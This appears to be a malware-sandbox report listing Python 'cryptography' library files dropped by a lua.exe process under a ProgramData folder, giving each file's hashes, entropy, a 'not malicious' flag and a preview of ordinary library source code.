MD5:	5BEC6D82E1109AE9ECA5D833FBAE720F
SHA1:	A83E23C3FF32B99DFEAD6A5CF723FAF6066E0157
SHA-256:	10486321982A0293BB7281AEC9B2D7C9A11A5881DC760F280B48B6BF14384522
SHA-512:	F1F4B738D1E39EF013A1CE10C6BCA928BCBDFE9F42F98AD346F69D412926EC41B9C6C6896463524A214AEE358AF7E4D8E8ADE09F3686D45F6755FFE2F3D301F5
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..._default_backend = None...def default_backend():. global _default_backend.. if _default_backend is None:. from cryptography.hazmat.backends.openssl.backend import backend.. _default_backend = backend.. return _default_backend...def _get_backend(backend):. if backend is None:. return default_backend(). else:. return backend.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\interfaces.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10770
Entropy (8bit):	4.5378510498237405
Encrypted:	false
SSDEEP:	192:FgFUStWaffGHafxP7pYwpiH8agtVpvpox1X06gJ:Fg17fGHafxPDpmfOojX06gJ
MD5:	9BAFC27E91AA1D395D9075313A14C221
SHA1:	86E0179283FAB8163739B454E636AFBEF86D5605
SHA-256:	197C921EBA462E0793AE3520C4E62D2BABE26A984ED5D0CA00E03DE49163FE93
SHA-512:	A25396E659BC6D908F5980B8BCF98DF336DA7BA9F11C57CD620CE752BA1AECD6EA819FC200EC674AB6DEE92C1B04DE335E434A4C98C89358F0E7C8073D44289D
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..import six...@six.add_metaclass(abc.ABCMeta).class CipherBackend(object):. @abc.abstractmethod. def cipher_supported(self, cipher, mode):. """. Return True if the given cipher and mode are supported.. """.. @abc.abstractmethod. def create_symmetric_encryption_ctx(self, cipher, mode):. """. Get a CipherContext that can be used for encryption.. """.. @abc.abstractmethod. def create_symmetric_decryption_ctx(self, cipher, mode):. """. Get a CipherContext that can be used for decryption.. """...@six.add_metaclass(abc.ABCMeta).class HashBackend(object):. @abc.abstractmethod. def hash_supported(self, algorithm):. """. Return True if the ha

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	336
Entropy (8bit):	4.729066290839668
Encrypted:	false
SSDEEP:	6:SbFpbtcMi6O0vgad8pq/ZOwA9lJuzDMABCR1SX59KiLeRb1OI90RJ21:qD+6O0vgEVhO17yDjCy5oNZOISRJU
MD5:	12B5564E72DDC097CED1F5E6A97C2692
SHA1:	DC38D2589E97959A1081393142B3340FFC963FF3
SHA-256:	9380CC7B6DBCFE14EE076918DCBC24EB625D23712609DED5915D35CC99B9EE9B
SHA-512:	60D2A89D84C6A2CEB5E73EFE861A90429D5934D04137E95694E880B11B2D8DF423A0E78C4E0AC3117C9ECDE14786B8F650A759231F04D3CDA3D35583E4A68F6D
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography.hazmat.backends.openssl.backend import backend...__all__ = ["backend"].

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\aead.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5765
Entropy (8bit):	4.862733133153451
Encrypted:	false
SSDEEP:	96:FVGhTtl0KuPRWfRWDYARW1BWBWffcRWpppRWJOWpRWyrWJn9RWzWSQgDWpRWcoRT:F4hT/LuPRWfRW8ARWzWBWffcRWpppRWt
MD5:	64DF27DE311D3BD43FA9B7B88D39507B
SHA1:	2DCB489B3B810519E20CB9903FC07C7F19CA4D7B
SHA-256:	963392908ECD5E05E2F4EC9F1E39BD274EE6DC454714D9BD91F1C02288125AD7
SHA-512:	AA59FBC927901B57A045028653F2AD2B26F938E650693E7E9C7899EDA26747B66149D999C62711078935E4733980F086973EDD6B26856AA2624D01FB219D9A83
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography.exceptions import InvalidTag..._ENCRYPT = 1._DECRYPT = 0...def _aead_cipher_name(cipher):. from cryptography.hazmat.primitives.ciphers.aead import (. AESCCM,. AESGCM,. ChaCha20Poly1305,. ).. if isinstance(cipher, ChaCha20Poly1305):. return b"chacha20-poly1305". elif isinstance(cipher, AESCCM):. return "aes-{}-ccm".format(len(cipher._key) * 8).encode("ascii"). else:. assert isinstance(cipher, AESGCM). return "aes-{}-gcm".format(len(cipher._key) * 8).encode("ascii")...def _aead_setup(backend, cipher_name, key, nonce, tag, tag_len, operation):. evp_cipher = backend._lib.EVP_get_cipherbyname(cipher_name). backend.openssl_assert(evp_cipher != backend._ffi.NULL).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\backend.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	106372
Entropy (8bit):	4.691855713814495
Encrypted:	false
SSDEEP:	768:y0mCciQvzvwOKR4UyRugmm3PKlsUVSzPExGIqt0o+5Jvoktmrn5TSXTC2qA48JkE:dCcOe41mlKcik8EjJ9Xd8VQITO
MD5:	A4C177751BDAA0B43E6C0F14490265D8
SHA1:	11EE8D5329E6D573F694CE0A35413247417094C0
SHA-256:	0B02133C59FB177063C6BFD6EB114970822FF8C2E540B24575C9ECA3C492FD4D
SHA-512:	CEE733CA1C453601324967A6D56D7876267D2C1E1C3DD3863CF8D268EDE06AFB66B89A1A50E8D0D39C005BD96CE473B7109DCAF18FF286A376B9AF9E1413820B
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import collections.import contextlib.import itertools.import warnings.from contextlib import contextmanager..import six.from six.moves import range..from cryptography import utils, x509.from cryptography.exceptions import UnsupportedAlgorithm, _Reasons.from cryptography.hazmat._der import (. INTEGER,. NULL,. SEQUENCE,. encode_der,. encode_der_integer,.).from cryptography.hazmat.backends.interfaces import (. CMACBackend,. CipherBackend,. DERSerializationBackend,. DHBackend,. DSABackend,. EllipticCurveBackend,. HMACBackend,. HashBackend,. PBKDF2HMACBackend,. PEMSerializationBackend,. RSABackend,. ScryptBackend,. X509Backend,.).from cryptography.hazmat.backends.openssl import aead.from cryptog

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\ciphers.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8608
Entropy (8bit):	4.467409640298474
Encrypted:	false
SSDEEP:	96:FZUz6vxdbfg2JgveNHoY5Rp000prlpkwY2XrOasM/Tvfe:FZUz6vxRgnvK/5ArprLYe/bu
MD5:	900E5C1F06125D88415011CB7E8DD365
SHA1:	817A9E92AFD11F658922C844EAE2465B54E01FE1
SHA-256:	5AB981819D8F0956DA3241DD7CA99852FA15670C10E4EFB5CA5CECB4D69D38D7
SHA-512:	D08C7CED1BFF6CF400DBF3408EEAF4A2FFA3C94E5ADE63CC2EC49A311E0AFEA83400D614EB88CCED413AB731E58BD644C823142AE8314EC52D02DCCBD416473E
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import utils.from cryptography.exceptions import InvalidTag, UnsupportedAlgorithm, _Reasons.from cryptography.hazmat.primitives import ciphers.from cryptography.hazmat.primitives.ciphers import modes...@utils.register_interface(ciphers.CipherContext).@utils.register_interface(ciphers.AEADCipherContext).@utils.register_interface(ciphers.AEADEncryptionContext).@utils.register_interface(ciphers.AEADDecryptionContext).class _CipherContext(object):. _ENCRYPT = 1. _DECRYPT = 0. _MAX_CHUNK_SIZE = 2 ** 31 - 1.. def __init__(self, backend, cipher, mode, operation):. self._backend = backend. self._cipher = cipher. self._mode = mode. self._operation = operation. self._tag = None.. if

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\cmac.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2855
Entropy (8bit):	4.6369273696485
Encrypted:	false
SSDEEP:	48:IDoWmf5jDHoa0w/nvSEtDjgXIyB2GsCH0RsUzGJCPtiCCnZA9C12D9CwU6oCgCIc:Fblrout3i2AGn3Wo
MD5:	0198E5C6F2982FB704BC9F4AE16D52EE
SHA1:	1A79E075AD40AD67046BA508EA4D4D0AEC9EB783
SHA-256:	9F7E165CD5EDFABD2DAE9DB4EEED1C48AC0632D87CA84884B368E38261CDB561
SHA-512:	75AA533D9EBBA9F0371180F7A7BACA2ECE0778F920C63A5D13485826CC6959571DBB2A228E64CD2D4AD359D20060BC12174AF3902DBDF5482C370A1EBA5A8E49
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function...from cryptography import utils.from cryptography.exceptions import (. InvalidSignature,. UnsupportedAlgorithm,. _Reasons,.).from cryptography.hazmat.primitives import constant_time.from cryptography.hazmat.primitives.ciphers.modes import CBC...class _CMACContext(object):. def __init__(self, backend, algorithm, ctx=None):. if not backend.cmac_algorithm_supported(algorithm):. raise UnsupportedAlgorithm(. "This backend does not support CMAC.",. _Reasons.UNSUPPORTED_CIPHER,. ).. self._backend = backend. self._key = algorithm.key. self._algorithm = algorithm. self._output_length = algorithm.block_size // 8.. if ctx is None:. registr

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\decode_asn1.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	32332
Entropy (8bit):	4.934351881187784
Encrypted:	false
SSDEEP:	384:Fgqq2dPrDM7hDBIeRQB/0KCzCE22bzhPD4744x59tP44GBs:7dPfM7hRR+/PCzCE0744r9V44GC
MD5:	8CFB10BAB098E784B7D245F03BAF57EC
SHA1:	ECBAFDE52C2322A1E0F154C2A1252051E31F08ED
SHA-256:	052D98FB866E75697E081FDF67462A55820E42B9EFEF388E863A68F9022AF3FA
SHA-512:	9DA14E0EC4955991E462648E2C6D490E1A31EB4C87D6F47BEAA1C0DE6B974A40D214211DDC8E4D8DDCA176D2ECE922B9871AEF9F085336555FAFCD3457389EFA
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import datetime.import ipaddress..import six..from cryptography import x509.from cryptography.hazmat._der import DERReader, INTEGER, NULL, SEQUENCE.from cryptography.x509.extensions import _TLS_FEATURE_TYPE_TO_ENUM.from cryptography.x509.name import _ASN1_TYPE_TO_ENUM.from cryptography.x509.oid import (. CRLEntryExtensionOID,. CertificatePoliciesOID,. ExtensionOID,. OCSPExtensionOID,.)...def _obj2txt(backend, obj):. # Set to 80 on the recommendation of. # https://www.openssl.org/docs/crypto/OBJ_nid2ln.html#return_values. #. # But OIDs longer than this occur in real life (e.g. Active. # Directory makes some very long OIDs). So we need to detect. # and properly handle the case where the default buffer is not. #

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\dh.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10239
Entropy (8bit):	4.677471884912867
Encrypted:	false
SSDEEP:	192:FZSHljRHqOMkvjHRDeqEz1H2ZL0PCYunHR/Km6L:FUhxDeqG1HSL0PCYEx/K7L
MD5:	B4EBB03A03529E9134B9A7FBBDBC3032
SHA1:	E249C6C8A4A6CC2F997A33CD960D54D8A9F822D7
SHA-256:	D5F667F289DED9A4A56BCE4B21EEAF5DB7F4AA82D30D2F81EED60C72B26C8676
SHA-512:	9ECE8D6F7470E78BC72F5D064812C886DC7BB1C7C1174FDB301396533755C514907C8B233D87A785D31B6829FEC64EB93804851D73748C2332559D4C16041957
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import utils.from cryptography.exceptions import UnsupportedAlgorithm, _Reasons.from cryptography.hazmat.primitives import serialization.from cryptography.hazmat.primitives.asymmetric import dh...def _dh_params_dup(dh_cdata, backend):. lib = backend._lib. ffi = backend._ffi.. param_cdata = lib.DHparams_dup(dh_cdata). backend.openssl_assert(param_cdata != ffi.NULL). param_cdata = ffi.gc(param_cdata, lib.DH_free). if lib.CRYPTOGRAPHY_IS_LIBRESSL:. # In libressl DHparams_dup don't copy q. q = ffi.new("BIGNUM **"). lib.DH_get0_pqg(dh_cdata, ffi.NULL, q, ffi.NULL). q_dup = lib.BN_dup(q[0]). res = lib.DH_set0_pqg(param_cdata, ffi.NULL, q_dup, ffi.NULL). backend.openssl_ass

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\dsa.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10036
Entropy (8bit):	4.710744177205574
Encrypted:	false
SSDEEP:	192:FZcGADnrgRWcs0RWgMaakfupEZvcLSflFzczwox5vSLSOpQqF:Fip3MJkLSfldczwo3aLSOOqF
MD5:	A74F028D433B7FA98A3F2BB01AD59D7B
SHA1:	27F1A428D941BDDE0F60E20695671030EF120BA4
SHA-256:	0A9D70D59E89FCF116F90776440CDF0B4E0C53D631A9839A79FE7B7FF415A582
SHA-512:	CEA301BFDC0FABFACF19B2A33C55E10DD232F6DC42CB5C486F9EC9DD6CC0D8839A39273B2A3BCF70F2BAC2C9131F8B9DDF5DE9AC8485FCE4206D96235A12A952
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import utils.from cryptography.exceptions import InvalidSignature.from cryptography.hazmat.backends.openssl.utils import (. _calculate_digest_and_algorithm,. _check_not_prehashed,. _warn_sign_verify_deprecated,.).from cryptography.hazmat.primitives import hashes.from cryptography.hazmat.primitives.asymmetric import (. AsymmetricSignatureContext,. AsymmetricVerificationContext,. dsa,.)...def _dsa_sig_sign(backend, private_key, data):. sig_buf_len = backend._lib.DSA_size(private_key._dsa_cdata). sig_buf = backend._ffi.new("unsigned char[]", sig_buf_len). buflen = backend._ffi.new("unsigned int *").. # The first parameter passed to DSA_sign is unused by OpenSSL but. # must be an integer.. res

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\ec.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12071
Entropy (8bit):	4.711706788125094
Encrypted:	false
SSDEEP:	192:FZJ+5+G9bsRqFMwVpRW1AVRWqf2azU49LhkHYbAnCS3trNXLhkHzpbfEPw:Fnhqtn9KYCCS9rN9Kzx
MD5:	FE41E3F0154A28386223B1088E40C3AB
SHA1:	3F74E4CB99E8A0A1D8CD7F095010F1E2954B1EF0
SHA-256:	7370D46FF019DB5E5FF406801F238AA81A0D51277AB056D420331B2EB6CBB8B0
SHA-512:	80459D25D43C7529880573F00C9F9DDD158076BCB5DFCC32BCAC5E388E64698F8A0A13A210131B95630630E7BFB84F8A4D5C7E8A92DA825DD106A10408A35B4D
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import utils.from cryptography.exceptions import (. InvalidSignature,. UnsupportedAlgorithm,. _Reasons,.).from cryptography.hazmat.backends.openssl.utils import (. _calculate_digest_and_algorithm,. _check_not_prehashed,. _warn_sign_verify_deprecated,.).from cryptography.hazmat.primitives import hashes, serialization.from cryptography.hazmat.primitives.asymmetric import (. AsymmetricSignatureContext,. AsymmetricVerificationContext,. ec,.)...def _check_signature_algorithm(signature_algorithm):. if not isinstance(signature_algorithm, ec.ECDSA):. raise UnsupportedAlgorithm(. "Unsupported elliptic curve signature algorithm.",. _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM,.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\ed25519.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5618
Entropy (8bit):	4.690533964725166
Encrypted:	false
SSDEEP:	48:IDoWOmjZ9USF/M2G3lAAkOQZmrZbeZHrOvyiUNdeeuVF/dZbeZHuYRHvyiUNZVZ/:FbYZnF/fGgqJVF/dmR0xZWGNL16nw
MD5:	41796A7B9DE38EFB6CAFA1890CB3872A
SHA1:	DBE24C25DB65E26FBAD672B52B8FC34A35BD3B2C
SHA-256:	7C89CBA69C07667620C24410E4C76C382BB1FF2DE47D6FB6F7411B1A7FB46CA1
SHA-512:	74E175BD1D9BA1DF38AD1B71DC4DFFA77FB664EBD47CED4A81D2C4A084C9BADACB3F09EF85AB4AC122DB3CC3825E481FA9BBD6AC789C7C39C1799F8BCCE26515
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import exceptions, utils.from cryptography.hazmat.primitives import serialization.from cryptography.hazmat.primitives.asymmetric.ed25519 import (. Ed25519PrivateKey,. Ed25519PublicKey,. _ED25519_KEY_SIZE,. _ED25519_SIG_SIZE,.)...@utils.register_interface(Ed25519PublicKey).class _Ed25519PublicKey(object):. def __init__(self, backend, evp_pkey):. self._backend = backend. self._evp_pkey = evp_pkey.. def public_bytes(self, encoding, format):. if (. encoding is serialization.Encoding.Raw. or format is serialization.PublicFormat.Raw. ):. if (. encoding is not serialization.Encoding.Raw. or format is not serialization.PublicF

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\ed448.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5574
Entropy (8bit):	4.6648194949217645
Encrypted:	false
SSDEEP:	48:IDoWLLF/M2G3lAAkOQZmrZ1cZHLOvyiUNdeeuBF/dZ1cZH8UHvyiUNZVZ1/RtaHu:FYLF/fGgq1BF/dg0DfWGNL16nU
MD5:	AFF5A8CA66294808FFBA67C5C12DA075
SHA1:	2569ABBA727FC77B572ACD758A70B87E481AEABD
SHA-256:	5A9EDD90F8DBD93CA3CE0BA1D5B1F0CD722D30FA89ABF03DF83EF30B01EA9DCF
SHA-512:	19F78E36B17B3ADDF93E723AFC33EA19909E7A4BFC007BE184A09424945FBEB9ECC5C65062C960AEF4D920F2BEB20946DD772913637044509A5FEB2A6672867E
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import exceptions, utils.from cryptography.hazmat.primitives import serialization.from cryptography.hazmat.primitives.asymmetric.ed448 import (. Ed448PrivateKey,. Ed448PublicKey,.).._ED448_KEY_SIZE = 57._ED448_SIG_SIZE = 114...@utils.register_interface(Ed448PublicKey).class _Ed448PublicKey(object):. def __init__(self, backend, evp_pkey):. self._backend = backend. self._evp_pkey = evp_pkey.. def public_bytes(self, encoding, format):. if (. encoding is serialization.Encoding.Raw. or format is serialization.PublicFormat.Raw. ):. if (. encoding is not serialization.Encoding.Raw. or format is not serialization.PublicFormat.Raw.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\encode_asn1.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	24075
Entropy (8bit):	4.902007396205595
Encrypted:	false
SSDEEP:	384:F02QNED7ciCM9ACuwFm/iQ8MX4t4WUVz5:OdwnCMiCZFjQ85t4WUn
MD5:	73FF69F0323E8316904A4DEB622C8E3D
SHA1:	26EB83407056308F3054E58A8095CEC82932CAE3
SHA-256:	E6D4262DF2C4C8A4E6DC483F19F84625C3EDB90D047F639D6EC831542D9F70C7
SHA-512:	07127F413BF2C2FEB492B4EFA4CA2642E25DA50702FE451D8AE30F1CD49911EA02580DA914BAA499B7C03D05AD86DFDA3EEA10D555874F6F0D644174945A5465
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import calendar.import ipaddress..import six..from cryptography import utils, x509.from cryptography.hazmat.backends.openssl.decode_asn1 import (. _CRL_ENTRY_REASON_ENUM_TO_CODE,. _DISTPOINT_TYPE_FULLNAME,. _DISTPOINT_TYPE_RELATIVENAME,.).from cryptography.x509.name import _ASN1Type.from cryptography.x509.oid import (. CRLEntryExtensionOID,. ExtensionOID,. OCSPExtensionOID,.)...def _encode_asn1_int(backend, x):. """. Converts a python integer to an ASN1_INTEGER. The returned ASN1_INTEGER. will not be garbage collected (to support adding them to structs that take. ownership of the object). Be sure to register it for GC if it will be. discarded after use... """. # Convert Python integer to OpenSSL "bignum"

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\hashes.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3117
Entropy (8bit):	4.550357993756065
Encrypted:	false
SSDEEP:	48:IDoWmZfouXsGsUI9t/Z7pnEJVVgUgab0J19nT1DiZTJ+xkuUZgKe:FbZfouGKKtiVS
MD5:	1A12BC732B8E59B8A6170B0809639994
SHA1:	B74DBC8D6412F2DE3647B33CB416FFF10A7E6440
SHA-256:	9FA5C9C0223ED8E53A1677626AD15B13F3E06F77F536856E1F0A42316D33DF8D
SHA-512:	BFB45BF72CEA58987854B3E655D74AF1A39DE9B620C97BF7F93FAD1FDAB7114A6ED16E2C9636481197DF17BCB28DB3508D95CE1D9A8916D3AF29978CB42FAA88
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function...from cryptography import utils.from cryptography.exceptions import UnsupportedAlgorithm, _Reasons.from cryptography.hazmat.primitives import hashes...@utils.register_interface(hashes.HashContext).class _HashContext(object):. def __init__(self, backend, algorithm, ctx=None):. self._algorithm = algorithm.. self._backend = backend.. if ctx is None:. ctx = self._backend._lib.EVP_MD_CTX_new(). ctx = self._backend._ffi.gc(. ctx, self._backend._lib.EVP_MD_CTX_free. ). evp_md = self._backend._evp_md_from_algorithm(algorithm). if evp_md == self._backend._ffi.NULL:. raise UnsupportedAlgorithm(. "{} is not a supported hash on t

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\hmac.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2933
Entropy (8bit):	4.639245707191957
Encrypted:	false
SSDEEP:	48:IDoWmf5RkHj+Xsr0RsUY9t/Z7rcyKD7NHUcsbDpJ1tkZjJuJhEe3c0Jqco:Fb3Qj+A/YjWo
MD5:	01C6EE1AFF7CA9DB21A69C3E9E3542FE
SHA1:	F1FD14CB3D12B8822EF1AD8360E68D60F3E4C3FF
SHA-256:	0FF61C1763A22D27EB5AD03B7E4B0B88A59C69587E1B58A0A6A347B8CE65EB67
SHA-512:	3E5C5A17F051F24445803B491AD7DDCD0B013A99AC12A018CDEF11F352517DCB14C74A9F9FD87B9D084595FC9D2E206641931C82954498D7E7EA0D8EF4F3CF22
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function...from cryptography import utils.from cryptography.exceptions import (. InvalidSignature,. UnsupportedAlgorithm,. _Reasons,.).from cryptography.hazmat.primitives import constant_time, hashes...@utils.register_interface(hashes.HashContext).class _HMACContext(object):. def __init__(self, backend, key, algorithm, ctx=None):. self._algorithm = algorithm. self._backend = backend.. if ctx is None:. ctx = self._backend._lib.HMAC_CTX_new(). self._backend.openssl_assert(ctx != self._backend._ffi.NULL). ctx = self._backend._ffi.gc(ctx, self._backend._lib.HMAC_CTX_free). evp_md = self._backend._evp_md_from_algorithm(algorithm). if evp_md == self._backend._ffi.NULL:.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\ocsp.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14028
Entropy (8bit):	4.7070723650681305
Encrypted:	false
SSDEEP:	192:FRLkHRWeRjOHRWCRoiRW8RPBRWdurl2XC1NSVhw+UHTcHlaa90g4PVNTaWMUZHVx:Foj0tKf4AVhw5z2laa90g4tMWMUZ1x
MD5:	2C25619DBB0A16441B3CCEBE16D33AD9
SHA1:	2FD2A86BEFAF86C4C412706EC1750DD21ACDEF19
SHA-256:	3441AB737D067CF04B6E39EDF8ADCAE3CF9D64AD9D13241ADA80B2BFBFA568CB
SHA-512:	33BBA955BC3B17C41138B99A4D0E04AE223AF2E90EAA92405D33C0C1E5F88107426F038EAA25FA9B82820A70D34F8E8E3FF3F9E8E903D11AFCC48C180A9D8F6F
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import functools..from cryptography import utils, x509.from cryptography.exceptions import UnsupportedAlgorithm.from cryptography.hazmat.backends.openssl.decode_asn1 import (. _CRL_ENTRY_REASON_CODE_TO_ENUM,. _asn1_integer_to_int,. _asn1_string_to_bytes,. _decode_x509_name,. _obj2txt,. _parse_asn1_generalized_time,.).from cryptography.hazmat.backends.openssl.x509 import _Certificate.from cryptography.hazmat.primitives import serialization.from cryptography.x509.ocsp import (. OCSPCertStatus,. OCSPRequest,. OCSPResponse,. OCSPResponseStatus,. _CERT_STATUS_TO_ENUM,. _OIDS_TO_HASH,. _RESPONSE_STATUS_TO_ENUM,.)...def _requires_successful_response(func):. @functools.wraps(func). def wrapper(self, *args):

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\poly1305.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2393
Entropy (8bit):	4.756818649555658
Encrypted:	false
SSDEEP:	48:IDoW/BhCBeWShUbsv0fUfOuJ1zikZrUOhEPJrhn:FyBrin
MD5:	6C3353BB4E062579833A609E19F9B971
SHA1:	AD8117F4501C4286AB0619E053B6EEA60BA39F17
SHA-256:	2E2A2F5B84AF494856035D3D2242E5C389E7A24985F66DB8578A46C6AA0F98C2
SHA-512:	4568AE80EAAE2970F62520E1B99025551A68EC9E744C4720A4B6DFA9FC0DA2FD82963B463EB5771797F949AA0AEA5CE9FEB151329E5806BEA899C76E2DB88D6D
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function...from cryptography.exceptions import InvalidSignature.from cryptography.hazmat.primitives import constant_time..._POLY1305_TAG_SIZE = 16._POLY1305_KEY_SIZE = 32...class _Poly1305Context(object):. def __init__(self, backend, key):. self._backend = backend.. key_ptr = self._backend._ffi.from_buffer(key). # This function copies the key into OpenSSL-owned memory so we don't. # need to retain it ourselves. evp_pkey = self._backend._lib.EVP_PKEY_new_raw_private_key(. self._backend._lib.NID_poly1305,. self._backend._ffi.NULL,. key_ptr,. len(key),. ). self._backend.openssl_assert(evp_pkey != self._backend._ffi.NULL). self._evp_pkey = self._backend._f

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\rsa.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19577
Entropy (8bit):	4.751174745319746
Encrypted:	false
SSDEEP:	384:Fh8B0SjgxyFSAnQD83fjbQH3rBSeELiyCmkEMvV9XBS3VjpW:MOSJnQD83fjbAV2CZbsVjpW
MD5:	D2E3FB5D3E22B9AF22026906108694DD
SHA1:	DBE5063B359DB7BE1D2CD488385D86BA954F3D4F
SHA-256:	85C045CD9E752C0D9425F5467F4D31BA5E6758B793FBD4B3EEE7C22A5B35F79C
SHA-512:	EB62D033DCA64E03D7A81FBDD354BE58420012BA902D262E4217884E53374248935EBC67376C50EE9E56EA22FD0AB382D7D7C02004A2F19458C21BCF270A1857
Malicious:	false
